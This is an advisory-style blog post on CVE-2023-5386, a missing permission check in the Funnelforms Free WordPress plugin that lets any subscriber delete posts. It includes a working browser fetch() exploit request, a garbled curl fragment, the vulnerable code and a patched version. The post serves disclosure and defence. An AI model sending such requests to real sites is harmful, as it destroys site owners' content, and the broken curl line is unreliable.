CVE-2023-5386 - How a Funnelforms Free Plugin Flaw Lets Any Subscriber Delete Your WordPress Posts

Date Discovered: October 2023
Affected Plugin: Funnelforms Free for WordPress
Vulnerable Version: Up to and including 3.4
CVSS Score: 8.8 (High)
Original Advisory: Wordfence Vulnerability Report

Introduction

If you run a WordPress site and use the popular Funnelforms Free plugin, you should read this fully. The plugin, installed on over 10,000 websites, helps you create forms and collect leads. However, a serious security hole (CVE-2023-5386) lets even your lowest-level users *delete any post on your site* – including those written by administrators!

The reason? A *missing capability check* in a backend function, meaning your site's posts could vanish at the hands of any logged-in, non-trusted user.

What Is the CVE-2023-5386 Vulnerability?

In coding simple terms, this vulnerability exists because the plugin’s fnsf_delete_posts function does not check user permissions. This function lets users delete WordPress posts—any posts. Ideally, only site admins or editors should have this power, but here, even someone with *subscriber* permissions can do it.

> Breaking it down:
> Any authenticated user can send a request to this function and delete *any* post—including posts unrelated to the Funnelforms plugin.

Inside the plugin code, the deletion handler looks roughly like this

add_action('wp_ajax_fnsf_delete_posts', 'fnsf_delete_posts');

function fnsf_delete_posts() {
    $post_id = $_POST['post_id'];
    wp_delete_post($post_id);
    wp_send_json_success();
}

What's missing?
There’s no check like current_user_can('delete_post', $post_id) or even any general capability check like current_user_can('manage_options').

Steps to Exploit CVE-2023-5386

*This section is for educational and defensive purposes only.*

Use your browser console, Postman, or curl to send

b "wordpress_logged_in_YourUserCookie" \

https://example.com/wp-admin/admin-ajax.php

`

Example JavaScript in Browser Console

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    credentials: 'include',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'action=fnsf_delete_posts&post_id=123'
})
.then(response => response.json())
.then(data => console.log(data));

Destruction is not limited to Funnelforms' data; it affects your *entire website*.

- Attackers could wipe pages, posts, or even posts written by administrators, leading to data loss and possible business disruption.

Technical Reference Links

- Wordfence Vulnerability Advisory
- NVD CVE Record
- Plugin Directory: Funnelforms Free

The function must check if the user has the permission to delete the specific post

function fnsf_delete_posts() {
    $post_id = intval($_POST['post_id']);
    if (!current_user_can('delete_post', $post_id)) {
        wp_send_json_error('Unauthorized', 403);
        return;
    }
    wp_delete_post($post_id);
    wp_send_json_success();
}

Conclusion

CVE-2023-5386 lets any logged-in user wipe out any post on your WordPress site if you use Funnelforms Free v3.4 or older. Update the plugin, audit your users, and keep security in your mind for every plugin you use. Always check for capability checks in your own or third-party WordPress code.

Timeline

Published on: 11/22/2023 16:15:11 UTC
Last modified on: 11/27/2023 20:14:47 UTC